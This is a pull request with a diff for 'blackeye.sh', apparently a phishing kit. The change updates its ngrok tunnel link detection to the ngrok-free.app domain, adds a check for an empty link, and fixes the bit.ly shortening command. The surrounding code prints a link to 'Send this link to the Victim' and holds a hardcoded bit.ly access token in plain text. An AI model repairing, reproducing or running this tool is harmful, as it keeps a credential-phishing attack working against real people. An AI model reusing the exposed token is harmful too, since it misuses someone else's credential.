### PR TITLE
FIX outdated ngrok link "null"

### DIFF
--- a/blackeye.sh
+++ b/blackeye.sh
@@ -421,11 +421,15 @@ printf "\e[1;92m[\e[0m*\e[1;92m] Starting ngrok server...\n"
 ./ngrok http 127.0.0.1:5555  > /dev/null 2>&1 &
 sleep 10
 
-link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
+link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok-free.app") # Use ngrok-free.app instead of ngrok.io now.
+if [ -z "$link" ]; then
+    echo "Error: The link is null or empty. Please if the ngrok server is actually running!"
+    exit 1
+fi
 printf "\e[1;92m[\e[0m*\e[1;92m] Send this link to the Victim:\e[0m\e[1;77m %s\e[0m\n" $link
 Accesstoken=433bdc6028d67bba06cf95286e923cde8c0906c7
 api=https://api-ssl.bitly.com/v4/shorten
-short_link=`curl -s -H Authorization:\ $Accesstoken -H Content-Type: -d '{"long_url": "'"$link"\"} $api | jq -j .link | xsel -ib; xsel -ob;` 
+short_link=`curl -s -H Authorization:\ $Accesstoken -H Content-Type: -d '{"long_url": "'"$link"'"}' $api | jq -j .link | xsel -ib; xsel -ob;` 
 printf "\e[1;92m[\e[0m*\e[1;92m] Use shortened link instead:\e[0m\e[1;77m %s\e[0m\n" $short_link
 echo ""
 echo ""


### PR DESCRIPTION
ngrok.io no longer seems to work, use ngrok-free.app instead.
Also added a check whether the ngrok link is null or not. Exit with an error if that is the case!